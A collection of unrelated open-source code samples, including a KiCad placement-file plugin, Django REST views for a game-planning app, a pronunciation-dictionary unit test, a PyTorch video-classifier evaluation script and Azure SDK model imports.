ldata = np.zeros(len(variables)) if zero_lbias else r.normal(loc, scale, size=len(variables))
qdata = r.normal(loc, scale, size=len(irow))
offset = r.normal(loc, scale)
return cls.from_numpy_vectors(ldata, (irow, icol, qdata), offset, vartype,
variable_order=variables)
| StarcoderdataPython |
88005 | import csv
import os
import pcbnew
import re
import wx
from decimal import Decimal, getcontext
from pathlib import Path
ref_ignore = ["TP", "T", "NT", "REF**", "G", "H"]
# original rotation db from:
# https://github.com/matthewlai/JLCKicadTools/blob/master/jlc_kicad_tools/cpl_rotations_db.csv
rotations = {
"^SOT-223": 180,
"^SOT-23": 180,
"^SOT-353": 180,
"^QFN-": 270,
"^LQFP-": 270,
"^TQFP-": 270,
"^SOP-(?!18_)": 270,
"^TSSOP-": 270,
# "^DFN-": 270,
"^SOIC-": 90,
"^SOP-18_": 0,
"^VSSOP-10_": 270,
"^CP_EIA-3216-18_": 180,
"^CP_Elec_8x10.5": 180,
"^CP_Elec_6.3x7.7": 180,
"^CP_Elec_8x6.7": 180,
"^(.*?_|V)?QFN-(16|20|24|28|40)(-|_|$)": 270,
"^MSOP-10_": 90,
"^R_Array_Convex_4x0603": 90,
"^XCVR_ESP32-WROVER-B": 270,
"^PinSocket_1x(04|05)_P2.54mm_Vertical": 270,
"Buzzer_MLT-8530_C94599": 0,
"SW_Tactile_SPST_Angled_PTS645Vx58-2LFS": 180,
"USB_C_Receptacle_HRO_TYPE-C-31-M-12": 180,
"USB_Micro-B_Molex-105017-0001": 270,
}
midpoint_correction = {
"^PinSocket_1x04_P2.54mm_Vertical": (Decimal(0), Decimal(-3.81)),
"^PinSocket_1x05_P2.54mm_Vertical": (Decimal(0), Decimal(-5.08)),
"^XCVR_ESP32-WROVER-B": (Decimal(0), Decimal(0.04)),
"BarrelJack": (Decimal(-6.5), Decimal(0)),
"^SW_SPST_HRO": (Decimal(0), Decimal(1.65)),
"USB_C_Receptacle_HRO_TYPE-C-31-M-12": (Decimal(1.8), Decimal(0.65)),
"SW_Tactile_SPST_Angled_PTS645Vx58-2LFS": (Decimal(2.2), Decimal(-1)),
}
#
# helper functions from https://docs.python.org/3/library/decimal.html
#
def pi():
"""Compute Pi to the current precision.
>>> print(pi())
3.141592653589793238462643383
"""
getcontext().prec += 2 # extra digits for intermediate steps
three = Decimal(3) # substitute "three=3.0" for regular floats
lasts, t, s, n, na, d, da = 0, three, 3, 1, 0, 0, 24
while s != lasts:
lasts = s
n, na = n+na, na+8
d, da = d+da, da+32
t = (t * n) / d
s += t
getcontext().prec -= 2
return +s # unary plus applies the new precision
def cos(x):
"""Return the cosine of x as measured in radians.
The Taylor series approximation works best for a small value of x.
For larger values, first compute x = x % (2 * pi).
>>> print(cos(Decimal('0.5')))
0.8775825618903727161162815826
>>> print(cos(0.5))
0.87758256189
>>> print(cos(0.5+0j))
(0.87758256189+0j)
"""
getcontext().prec += 2
i, lasts, s, fact, num, sign = 0, 0, 1, 1, 1, 1
while s != lasts:
lasts = s
i += 2
fact *= i * (i-1)
num *= x * x
sign *= -1
s += num / fact * sign
getcontext().prec -= 2
return +s
def sin(x):
"""Return the sine of x as measured in radians.
The Taylor series approximation works best for a small value of x.
For larger values, first compute x = x % (2 * pi).
>>> print(sin(Decimal('0.5')))
0.4794255386042030002732879352
>>> print(sin(0.5))
0.479425538604
>>> print(sin(0.5+0j))
(0.479425538604+0j)
"""
getcontext().prec += 2
i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1
while s != lasts:
lasts = s
i += 2
fact *= i * (i-1)
num *= x * x
sign *= -1
s += num / fact * sign
getcontext().prec -= 2
return +s
class JLCSMTPlugin(pcbnew.ActionPlugin):
def defaults(self):
self.name = "Generate JLCSMT Placement Files"
self.category = "Fabrication Outputs"
self.description = "Generates the CPL placement files as expected by JLCSMT"
self.show_toolbar_button = True
self.icon_file_name = os.path.join(
os.path.dirname(__file__), 'KiJLC_32x32.png')
def Run(self):
board = pcbnew.GetBoard()
modules = board.GetFootprints() # was GetModules() but this does not work with KiCAD 6.0
origin = board.GetDesignSettings().GetAuxOrigin()
origin_x = Decimal(origin.x) / Decimal(1000000)
origin_y = Decimal(origin.y) / Decimal(-1000000)
fn = Path(board.GetFileName()).with_suffix("")
bot = open("{}_cpl_bot.csv".format(fn), "w", newline='')
top = open("{}_cpl_top.csv".format(fn), "w", newline='')
botw = csv.writer(bot, delimiter=',', quotechar='"',
quoting=csv.QUOTE_ALL)
topw = csv.writer(top, delimiter=',', quotechar='"',
quoting=csv.QUOTE_ALL)
hdr = ["Designator", "Mid X", "Mid Y", "Layer", "Rotation"]
botw.writerow(hdr)
topw.writerow(hdr)
for mod in modules:
skip = False
ref = mod.GetReference()
for prefix in ref_ignore:
if ref.startswith(prefix):
skip = True
if skip:
continue
pos = mod.GetPosition()
rot = mod.GetOrientationDegrees()
desc = mod.GetDescription()
layer = board.GetLayerName(mod.GetLayer())
mid_x = Decimal(pos[0]) / Decimal(1000000)
mid_y = Decimal(pos[1]) / Decimal(-1000000)
footprint = str(mod.GetFPID().GetLibItemName())
print(footprint)
# some library parts have a different origin than the JLC parts, try to correct it
for exp in midpoint_correction:
if re.match(exp, footprint):
px, py = midpoint_correction[exp]
rad = Decimal(rot) * pi() / Decimal(180)
qx = cos(rad) * px - sin(rad) * py
qy = sin(rad) * px + cos(rad) * py
qx = qx.quantize(Decimal('0.001'))
qy = qy.quantize(Decimal('0.001'))
print(f"previous midpoint for {footprint} x: {mid_x}, y: {mid_y}; new x: {mid_x + qx}, y: {mid_y + qy}")
mid_x += qx
mid_y += qy
for exp in rotations:
if re.match(exp, footprint):
new_rot = (rot + rotations[exp]) % 360
print(f"rotating {ref} ({footprint}): prev {rot}, new {new_rot}")
rot = new_rot
x = str(mid_x - origin_x) + "mm"
y = str(mid_y - origin_y) + "mm"
if layer == "F.Cu":
topw.writerow([ref, x, y, "top", rot])
elif layer == "B.Cu":
botw.writerow([ref, x, y, "bottom", rot])
bot.close()
top.close()
wx.MessageBox("Placement files generated.",
'Done', wx.OK | wx.ICON_INFORMATION)
JLCSMTPlugin().register()
| StarcoderdataPython |
3278470 | import re
from rest_framework import generics
from rest_framework import permissions
from rest_framework import exceptions
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from game_planner_api.serializers import PlayerSerializer, GameSerializer, GameExSerializer, NotificationSerializer, FriendshipSerializer, GameParticipationRequestSerializer
from .models import Player, Game, NotificationType, Notification, Friendship, GameParticipationRequest
class IndirectModelMixin:
# TODO: use GenericAPIView::super() instead of dupe code
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
indirect_field = get_object_or_404(self.indirect_model, **filter_kwargs)
# May raise a permission denied
self.check_object_permissions(self.request, indirect_field)
if indirect_field:
indirect_lookup = {self.indirect_lookup_field: indirect_field}
obj = get_object_or_404(queryset, **indirect_lookup)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
class PlayerList(generics.ListAPIView):
queryset = Player.objects.all()
serializer_class = PlayerSerializer
class PlayerDetail(IndirectModelMixin,
generics.RetrieveUpdateAPIView):
lookup_field = 'username'
indirect_lookup_field = 'user'
indirect_model = User
queryset = Player.objects.all()
serializer_class = PlayerSerializer
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
request_json = self.request.data
user = self.request.user
# Authenticated user removes {username} as friend
if 'action' in request_json and request_json['action'] == "remove_friend":
requester_player = Player.objects.get(user=user)
user_to_remove = User.objects.get(username=self.kwargs['username'])
player_to_remove = Player.objects.get(user=user_to_remove)
are_friends = player_to_remove in requester_player.friends.all()
if not are_friends:
raise exceptions.NotFound(detail="You are not %s's friend." % self.kwargs['username'])
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
serializer.save()
# Authenticated player updates his info
if 'action' in request_json and request_json['action'] == "update_player":
user_to_update = User.objects.get(username=self.kwargs['username'])
if not user_to_update == user:
raise exceptions.PermissionDenied()
if 'first_name' in request_json and len(request_json['first_name']) > 30:
raise exceptions.ParseError(detail="'first_name' must be a string with 30 characters or fewer.")
if 'last_name' in request_json and len(request_json['last_name']) > 150:
raise exceptions.ParseError(detail="'last_name' must be a string with 150 characters or fewer.")
if 'email' in request_json and request_json['email'] and not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", request_json['email']):
raise exceptions.ParseError(detail="Invalid 'email' address.")
if request_json['first_name']:
user.first_name = request_json['first_name']
if request_json['last_name']:
user.last_name = request_json['last_name']
if request_json['email']:
user.email = request_json['email']
user.save()
else:
raise exceptions.ParseError()
class GameList(generics.ListAPIView):
queryset = Game.objects.all()
serializer_class = GameSerializer
def get_queryset(self):
"""
Excludes games that user does not have permission to see.
"""
qs = super().get_queryset()
filter_q = Q(private=False)
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
# Get player's games list
player = Player.objects.get(user=user)
filter_q = filter_q | Q(admin=user) | Q(players=player)
return qs.filter(filter_q).distinct()
class GameDetailPermission(permissions.BasePermission):
"""
Public games can be seen by unauthenticated users
Private games can only be seen by participating players or admin
Games can be changed by game admin
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
authorized = not obj.private
if request.user and request.user.is_authenticated:
player = Player.objects.get(user=request.user)
is_admin = (request.user == obj.admin)
participating = (player in obj.players.all())
authorized = authorized or is_admin or participating
return authorized
# admin user can use non safe methods
return obj.admin == request.user
class GameDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'game_id'
queryset = Game.objects.all()
serializer_class = GameExSerializer
permission_classes = [GameDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
game = Game.objects.get(game_id=self.kwargs['game_id'])
if 'action' in self.request.data and self.request.data['action'] == 'add_player' and 'username' in self.request.data:
user_to_add = User.objects.filter(username=self.request.data['username'])
if not user_to_add:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_add = Player.objects.get(user=user_to_add[0])
if player_to_add in game.players.all():
raise Conflict(detail="'%s' is already participating in '%s'." % (self.request.data['username'], game.name))
game.players.add(player_to_add)
elif 'action' in self.request.data and self.request.data['action'] == 'remove_player' and 'username' in self.request.data:
user_to_remove = User.objects.filter(username=self.request.data['username'])
if not user_to_remove:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_remove = Player.objects.get(user=user_to_remove[0])
if not player_to_remove in game.players.all():
raise Conflict(detail="'%s' is not participating in '%s'." % (self.request.data['username'], game.name))
game.players.remove(player_to_remove)
else:
raise exceptions.ParseError()
class NotificationList(generics.ListAPIView):
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
def get_queryset(self):
"""
Only show notifications of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
return qs.filter(user=user)
permission_classes = [permissions.IsAuthenticated]
class NotificationDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return obj.user == request.user
class NotificationDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
permission_classes = [permissions.IsAuthenticated, NotificationDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH and DELETE requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
notification = Notification.objects.get(id=self.kwargs['id'])
if not self.request.user == notification.user:
raise exceptions.PermissionDenied()
if 'action' in self.request.data and self.request.data['action'] == 'mark_as_read':
if not notification.read_datetime:
serializer.save(read=True,
read_datetime=timezone.now())
elif 'action' in self.request.data and self.request.data['action'] == 'mark_as_unread':
serializer.save(read=False,
read_datetime=None)
else:
raise exceptions.ParseError()
class Conflict(exceptions.APIException):
status_code = 409
default_detail = 'Conflict'
default_code = 'conflict'
class FriendshipList(generics.ListCreateAPIView):
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show friend requests of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
friendship_type = self.request.query_params.get('type', None)
if friendship_type is not None:
if friendship_type == "incoming":
return qs.filter(Q(request_to=player) & Q(state__isnull=True))
elif friendship_type == "outgoing":
return qs.filter(Q(request_from=player) & Q(state__isnull=True))
elif friendship_type == "active":
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state__isnull=True)) | ((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
if not 'username' in request_json:
raise exceptions.ParseError(detail="\"username\" body parameter missing.")
requester_player = Player.objects.get(user=user)
requested_user = User.objects.filter(username=request_json['username'])
if not requested_user:
raise exceptions.NotFound(detail="Player %s not found." % request_json['username'])
requested_player = Player.objects.get(user=requested_user[0])
if requester_player == requested_player:
raise exceptions.PermissionDenied(detail="A player cannot add himself as a friend.")
outgoing_request = Friendship.objects.filter(request_from=requester_player, request_to=requested_player, state__isnull=True)
incoming_request = Friendship.objects.filter(request_from=requested_player, request_to=requester_player, state__isnull=True)
active_request = outgoing_request or incoming_request
if active_request:
raise Conflict(detail="An active friend request already exists between those users.")
already_friends = requested_player in list(requester_player.friends.all())
if already_friends:
raise Conflict(detail="Players are already friends with eachother.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=request_datetime,
sender=requester_player.user,
user=requested_player.user)
notification.save()
serializer.save(request_from=requester_player,
request_to=requested_player,
request_datetime=request_datetime)
class FriendshipDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
requester_user = User.objects.get(username=obj.request_from.user.username)
requested_user = User.objects.get(username=obj.request_to.user.username)
return (request.user == requested_user) | (request.user == requester_user)
class FriendshipDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated, FriendshipDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not ((self.request.user == friend_request.request_from.user or self.request.user == friend_request.request_to.user) and not friend_request.state):
raise exceptions.PermissionDenied()
if self.request.user == friend_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add to player's friends list and send notification to new friend
player = Player.objects.get(user=self.request.user)
player.friends.add(friend_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_AS_FRIEND.value,
creation_datetime=request_datetime,
sender=player.user,
user=friend_request.request_from.user)
notification.save()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="ACTIVE",
action_taken_datetime=request_datetime)
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
"""
TODO: let client DELETE friendships using /friendships/{username} instead of /friendships/{id}
"""
def perform_destroy(self, instance):
# Remove player from friends in the Player model
user = self.request.user
requester_player = Player.objects.get(user=user)
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not friend_request.state == "ACTIVE":
raise exceptions.PermissionDenied()
if friend_request.request_from == requester_player:
player_to_remove = friend_request.request_to
else:
player_to_remove = friend_request.request_from
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
# Delete active Friendship instance
instance.delete()
class GameParticipationRequestList(generics.ListCreateAPIView):
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show game participation requests of games that authenticated user is administering.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
return qs.filter((Q(request_to_game__admin=user) | Q(request_from=player)) & Q(state__isnull=True))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
if not 'game_id' in request_json:
raise exceptions.ParseError(detail="'game_id' body parameter missing.")
player = Player.objects.get(user=user)
game = get_object_or_404(Game, game_id=request_json['game_id'])
if player.user == game.admin:
raise exceptions.PermissionDenied(detail="A game admin cannot request participation to said game.")
active_request = GameParticipationRequest.objects.filter(request_from=player, request_to_game=game, state__isnull=True)
if active_request:
raise Conflict(detail="An active request already exists from this user.")
participating = player in game.players.all()
if participating:
raise Conflict(detail="Already participating.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=request_datetime,
sender=user,
game=game,
user=game.admin)
notification.save()
serializer.save(request_from=player,
request_to_game=game,
request_datetime=request_datetime)
class GamePaticipationRequestDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return ((request.user == obj.request_from.user or request.user == obj.request_to_game.admin) and not obj.state)
class GameParticipationRequestDetail(generics.RetrieveUpdateAPIView):
lookup_field = 'id'
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
permission_classes = [permissions.IsAuthenticated, GamePaticipationRequestDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
participation_request = GameParticipationRequest.objects.get(id=self.kwargs['id'])
if not ((self.request.user == participation_request.request_from.user or self.request.user == participation_request.request_to_game.admin) and not participation_request.state):
raise exceptions.PermissionDenied()
if self.request.user == participation_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
# Remove notification from game admin if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add player to game players list and send notification to player
participation_request.request_to_game.players.add(participation_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_TO_GAME.value,
creation_datetime=request_datetime,
sender=participation_request.request_to_game.admin,
game=participation_request.request_to_game,
user=participation_request.request_from.user)
notification.save()
# Mark game participation request notification as read if it still is unread
participation_request_notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if participation_request_notification:
participation_request_notification = Notification.objects.get(pk=participation_request_notification[0].pk)
participation_request_notification.read = True
participation_request_notification.read_datetime = request_datetime
participation_request_notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="ACCEPTED",
action_taken_datetime=request_datetime)
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark game participation request notification as read if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification = Notification.objects.get(pk=notification[0].pk)
notification.read = True
notification.read_datetime = request_datetime
notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
| StarcoderdataPython |
1707876 | #!/usr/bin/env python
import s3dict
import unittest
import os
import sys
class TestS3Dict(unittest.TestCase):
def setUp(self):
self.basedir = os.path.dirname(__file__)
def testRead(self):
foodict = s3dict.open(os.path.join(self.basedir, "test", "foo.dict"))
self.assert_('AH' in foodict.phoneset)
self.assertEquals(foodict.get_phones('A'), ['AH'])
self.assertEquals(foodict.get_alt_phones('A', 2), ['EY'])
self.assertEquals(foodict.get_phones('ZSWANG'), ['S', 'W', 'AE', 'NG'])
try:
foo = foodict.get_phones('QRXG')
print foo
except KeyError:
pass # Expected fail
else:
self.fail()
try:
foo = foodict.get_alt_phones('A',3)
except IndexError:
pass # Expected fail
else:
self.fail()
try:
foo = foodict.get_alt_phones('!@#$!@',3)
except KeyError:
pass # Expected fail
else:
self.fail()
self.assertEquals(foodict['A'], ['AH'])
self.assertEquals(foodict['A',2], ['EY'])
self.assertEquals(foodict['A(2)'], ['EY'])
self.assertEquals(foodict['ZSWANG'], ['S', 'W', 'AE', 'NG'])
def testCreate(self):
mydict = s3dict.S3Dict()
mydict.set_phones('A', ['AH'])
mydict.add_alt_phones('A', ['EY'])
mydict.set_phones('ZSWANG', ['S', 'W', 'AE', 'NG'])
mydict.set_alt_phones('A', 2, ['EY'])
try:
mydict.set_alt_phones('A', 5, ['AX'])
except IndexError:
pass # Expected fail
else:
self.fail()
self.assertEquals(mydict.get_phones('A'), ['AH'])
self.assertEquals(mydict.get_alt_phones('A', 2), ['EY'])
self.assertEquals(mydict.get_phones('ZSWANG'), ['S', 'W', 'AE', 'NG'])
mydict.set_alt_phones('A', 2, ['AA'])
self.assertEquals(mydict.get_alt_phones('A', 2), ['AA'])
self.assert_('ZSWANG' in mydict)
mydict.del_phones('ZSWANG')
self.assert_('ZSWANG' not in mydict)
self.assert_('NG' not in mydict.phoneset)
def testUnion(self):
foodict = s3dict.open(os.path.join(self.basedir, "test", "foo.dict"))
bardict = s3dict.open(os.path.join(self.basedir, "test", "bar.dict"))
bazdict = s3dict.union(foodict, bardict)
self.assertEquals(foodict['ACTUALLY'], bazdict['ACTUALLY'])
self.assert_('ABANDONED' in bazdict)
self.assert_('ZONES' in bazdict)
self.assert_('ZSWANG' in bazdict)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
3338561 | <gh_stars>0
import timeit
from datetime import datetime
import socket
import os
import glob
from tqdm import tqdm
import numpy as np
import matplotlib.pyplot as plt
import torch
from tensorboardX import SummaryWriter
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import seaborn as sns
from sklearn.metrics import confusion_matrix
from dataloaders.dataset import VideoDataset
from network import C3D_model, R2Plus1D_model, R3D_model
dataset = 'ucf101'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = C3D_model.C3D(num_classes=7, pretrained=True)
criterion = nn.CrossEntropyLoss()
checkpoint = torch.load("/home/liuhan/C3D/C3D-network/run/run_7/models/C3D-ucf101_epoch-119.pth.tar",map_location=lambda storage, loc: storage)
model.load_state_dict(checkpoint['state_dict'])
model.to(device)
criterion.to(device)
test_dataloader = DataLoader(VideoDataset(dataset=dataset, split='val', clip_len=16), batch_size=1, num_workers=4, shuffle=False)
model.eval()
running_loss = 0.0
running_corrects = 0.0
all_list = np.zeros((len(test_dataloader),7))
label = np.zeros(len(test_dataloader))
count = 0
for inputs, labels in tqdm(test_dataloader):
inputs = inputs.to(device)
labels = labels.to(device)
label[count] = np.array(labels)
with torch.no_grad():
outputs = model(inputs)
probs = nn.Softmax(dim=1)(outputs)
preds = torch.max(probs, 1)[1]
all_list[count,:] = np.array(probs)[0]
count = count + 1
np.save('Visual.npy',all_list)
np.save('label.npy',label)
#For plot the Confusion Matrix
'''
true_list = list(true_list)
pred_list = list(pred_list)
sns.set()
f,ax=plt.subplots()
pattern = {0:'Anger', 1:'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Neutral', 5: 'Sad', 6: 'Surprise'}
true_list = [pattern[x] if x in pattern else x for x in true_list]
pred_list = [pattern[x] if x in pattern else x for x in pred_list]
C2= confusion_matrix(true_list, pred_list, labels=['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'])
C2 = C2.astype('float')/C2.sum(axis=1).T
print(C2)
sns.heatmap(C2,annot=False,ax=ax, xticklabels =['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'], yticklabels =['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'])
label_y = ax.get_yticklabels()
plt.setp(label_y, rotation=45, horizontalalignment='right')
label_x = ax.get_xticklabels()
plt.setp(label_x, rotation=45, horizontalalignment='right')
plt.xlabel('Predicted label')
plt.ylabel('True label')
plt.tight_layout()
#ax.set_xlabel('Predicted label')
#ax.set_ylabel('True label')
plt.savefig("/home/liuhan/C3D/C3D-network/CAER_Confusion.png", dpi=300)
'''
| StarcoderdataPython |
80145 | <reponame>Mr-TelegramBot/python-tdlib
from ..factory import Type
class chatReportReasonViolence(Type):
pass
| StarcoderdataPython |
3353351 | <reponame>Kaushal-Dhungel/djangocms-icon
from django import forms
from .fields import IconField
from .models import Icon
class IconForm(forms.ModelForm):
icon = IconField(required=True)
class Meta:
model = Icon
fields = ('label', 'icon', 'template', 'attributes',)
| StarcoderdataPython |
3383551 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import AzureBackupGoalFeatureSupportRequest
from ._models_py3 import AzureBackupServerContainer
from ._models_py3 import AzureBackupServerEngine
from ._models_py3 import AzureFileShareBackupRequest
from ._models_py3 import AzureFileShareProtectableItem
from ._models_py3 import AzureFileShareProtectionPolicy
from ._models_py3 import AzureFileShareProvisionILRRequest
from ._models_py3 import AzureFileShareRecoveryPoint
from ._models_py3 import AzureFileShareRestoreRequest
from ._models_py3 import AzureFileshareProtectedItem
from ._models_py3 import AzureFileshareProtectedItemExtendedInfo
from ._models_py3 import AzureIaaSClassicComputeVMContainer
from ._models_py3 import AzureIaaSClassicComputeVMProtectableItem
from ._models_py3 import AzureIaaSClassicComputeVMProtectedItem
from ._models_py3 import AzureIaaSComputeVMContainer
from ._models_py3 import AzureIaaSComputeVMProtectableItem
from ._models_py3 import AzureIaaSComputeVMProtectedItem
from ._models_py3 import AzureIaaSVMErrorInfo
from ._models_py3 import AzureIaaSVMHealthDetails
from ._models_py3 import AzureIaaSVMJob
from ._models_py3 import AzureIaaSVMJobExtendedInfo
from ._models_py3 import AzureIaaSVMJobTaskDetails
from ._models_py3 import AzureIaaSVMJobV2
from ._models_py3 import AzureIaaSVMProtectedItem
from ._models_py3 import AzureIaaSVMProtectedItemExtendedInfo
from ._models_py3 import AzureIaaSVMProtectionPolicy
from ._models_py3 import AzureRecoveryServiceVaultProtectionIntent
from ._models_py3 import AzureResourceProtectionIntent
from ._models_py3 import AzureSQLAGWorkloadContainerProtectionContainer
from ._models_py3 import AzureSqlContainer
from ._models_py3 import AzureSqlProtectedItem
from ._models_py3 import AzureSqlProtectedItemExtendedInfo
from ._models_py3 import AzureSqlProtectionPolicy
from ._models_py3 import AzureStorageContainer
from ._models_py3 import AzureStorageErrorInfo
from ._models_py3 import AzureStorageJob
from ._models_py3 import AzureStorageJobExtendedInfo
from ._models_py3 import AzureStorageJobTaskDetails
from ._models_py3 import AzureStorageProtectableContainer
from ._models_py3 import AzureVMAppContainerProtectableContainer
from ._models_py3 import AzureVMAppContainerProtectionContainer
from ._models_py3 import AzureVMResourceFeatureSupportRequest
from ._models_py3 import AzureVMResourceFeatureSupportResponse
from ._models_py3 import AzureVmWorkloadItem
from ._models_py3 import AzureVmWorkloadProtectableItem
from ._models_py3 import AzureVmWorkloadProtectedItem
